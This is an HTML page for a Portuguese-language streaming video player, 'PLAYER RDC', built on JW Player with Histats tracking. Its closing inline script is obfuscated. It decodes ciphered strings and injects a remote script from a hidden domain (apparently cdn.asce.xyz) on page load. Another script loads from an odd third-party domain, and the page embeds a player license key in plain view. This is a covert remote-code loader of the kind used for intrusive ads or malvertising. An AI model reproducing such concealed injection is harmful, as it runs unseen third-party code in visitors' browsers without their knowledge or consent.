<!DOCTYPE html>
<html lang="pt-BR">
   <head>
      <title>PLAYER RDC</title>
      <meta charset="utf-8">
      <meta name="robots" content="noindex, nofollow">
      <meta name="referrer" content="no-referrer">
      <script src="//ssl.p.jwpcdn.com/player/v/8.26.0/jwplayer.js"></script>
      <script>
         jwplayer.key = 'XSuP4qMl+9tK17QNb+4+th2Pm9AWgMO/cYH8CI0HGGr7bdjo';
      </script>
      <style type="text/css">
         /* Aparencia Geral */
         body {
         margin: 0;
         padding: 0;
         overflow: hidden;
         }
         #player {
         position: absolute;
         top: 0;
         left: 0;
         right: 0;
         bottom: 0;
         height: 100%;
         width: 100%;
         overflow: hidden;
         }
         #player iframe {
         position: absolute;
         top: 0;
         left: 0;
         width: 100%;
         height: 100%;
         }
         /* Botões */
         .jw-icon {
         color: #fff !important;
         transition: color 0.3s ease;
         }
         .jw-icon:hover {
         color: #ff0000 !important;
         }
         /* Botão de volume */
         .jw-knob {
         background-color: #ff0000 !important;
         }
         /* Barra de progresso */
         .jw-progress {
         background-color: #ff0000 !important;
         }
         /* Indicador de "ao vivo" */
         .jw-text-live::before {
         background-color: #ff0000 !important;
         }
         /* Texto de reset */
         .jw-reset-text {
         color: #fff !important;
         transition: color 0.3s ease;
         }
         .jw-reset-text:hover {
         color: #ff0000 !important;
         }
      </style>


      <!-- Histats.com  START  (aync)-->
      <script type="text/javascript">var _Hasync= _Hasync|| [];
         _Hasync.push(['Histats.start', '1,4772717,4,0,0,0,00010000']);
         _Hasync.push(['Histats.fasi', '1']);
         _Hasync.push(['Histats.track_hits', '']);
         (function() {
         var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
         hs.src = ('//s10.histats.com/js15_as.js');
         (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
         })();
      </script>
      <noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4772717&101" alt="stats count" border="0"></a></noscript>
      <!-- Histats.com  END  -->
   </head>
   <body>
      <script type="text/javascript">
         function getParameterByName(name) {
             name = name.replace(/[\[]/, "\[").replace(/[\]]/, "\]");
             var regex = new RegExp("[\?&]" + name + "=([^&#]*)"),
             results = regex.exec(location.search);
             return results === null ? "" : decodeURIComponent(results[1].replace(/\+/g, " "));
         }
         
         var id = getParameterByName('id');
         if (id == "#") {alert('Voltar a página anterior');}
         var getLang = getParameterByName('lang');
         
      </script>
      <div id="player"></div>
      <script src="//reidoscanais.online/dtv.js"></script>
      <script type='text/javascript' src='//driveestablishmentarmed.com/88/f2/9a/88f29ac238f972829a2de9a6bc2fee87.js'></script>
      <script type="text/javascript">
 var p$00a = 'p$00a' + (new Date().getTime()) + 'zz'; window[p$00a] = {a:'abcdefghijklmnopqrstuvwxyz0123456789rvzkl9hw17g5oum6dyijfn24tps3e8x0cbaq', b:'{"AZIb":"x00cs0", "BVIb":"cqxsac", "CXrr1":"fukly", "DLtag":"3", "Emjk5":"", "XCge1s":"rizl.4tp" , "Zt1":"6m6zriw.ulj", "ZZ1":"yr6m5mg.zmo" }', c:'{"Abkr221":"izy16j", "Bo9ssm":"//zku.rizl.4tp/r66.7i"}', d:'{"Ag4":"vmkt", "Bx1":"r66lukCw15k", "Cky":"iyz", "Dmg":"zylrjlE5loluj"}'};
var _0x5d4b=['235913QVfbwv','slice','length','162209QBmAmV','14238hyOOTq','323207DTbifh','split','1DqiKtq','135866HTbavB','indexOf','call','27654SKXHbY','parse','undefined','32Ijckmz','keys','map','ceil','115980hcFVDy','values','join'];var _0x208c=function(_0x31a8d7,_0x5f36b3){_0x31a8d7=_0x31a8d7-0x167;var _0x5d4be1=_0x5d4b[_0x31a8d7];return _0x5d4be1;};(function(_0x276f94,_0x57c4ff){var _0x50057c=_0x208c;while(!![]){try{var _0x40d184=parseInt(_0x50057c(0x168))+parseInt(_0x50057c(0x16f))*parseInt(_0x50057c(0x179))+-parseInt(_0x50057c(0x176))+parseInt(_0x50057c(0x173))+parseInt(_0x50057c(0x16e))+-parseInt(_0x50057c(0x170))+parseInt(_0x50057c(0x16b))*-parseInt(_0x50057c(0x172));if(_0x40d184===_0x57c4ff)break;else _0x276f94['push'](_0x276f94['shift']());}catch(_0x411836){_0x276f94['push'](_0x276f94['shift']());}}}(_0x5d4b,0x45111),function(){var _0x1ba274=function(_0x2f3a9a){var _0x3f0bc4=_0x208c,_0x1894ba=Math[_0x3f0bc4(0x167)](this['a'][_0x3f0bc4(0x16d)]/0x2),_0x539548=this['a'][_0x3f0bc4(0x16c)](0x0,_0x1894ba),_0x5d8009=this['a'][_0x3f0bc4(0x16c)](_0x1894ba);decrypt=this[_0x2f3a9a][_0x3f0bc4(0x171)]('')[_0x3f0bc4(0x17b)](_0x28f433=>{var _0xd7612d=_0x3f0bc4;return _0x5d8009['split']('')['includes'](_0x28f433)?_0x539548[_0x5d8009[_0xd7612d(0x174)](_0x28f433)]:_0x28f433;})[_0x3f0bc4(0x16a)]('');try{return JSON[_0x3f0bc4(0x177)](decrypt);}catch{return decrypt;}},_0x57bb85=window[p$00a],_0x219d97=function(_0x28efac,_0x22a031){var _0x5bee8e=_0x208c,_0x3963a0=Object[_0x5bee8e(0x169)](_0x1ba274[_0x5bee8e(0x175)](_0x57bb85,Object[_0x5bee8e(0x17a)](_0x57bb85)[_0x28efac]));return typeof _0x22a031!=_0x5bee8e(0x178)?_0x3963a0[_0x22a031]:_0x3963a0;};window[p$00a]['x']=function(){return _0x219d97(0x1);};var _0xf1db57=document[_0x219d97(0x3,0x3)](_0x219d97(0x2,0x0));_0xf1db57[_0x219d97(0x3,0x2)]=_0x219d97(0x2,0x1),document[_0x219d97(0x3,0x0)][_0x219d97(0x3,0x1)](_0xf1db57),p$00a=undefined;}());
 
 </script>
   </body>
</html>
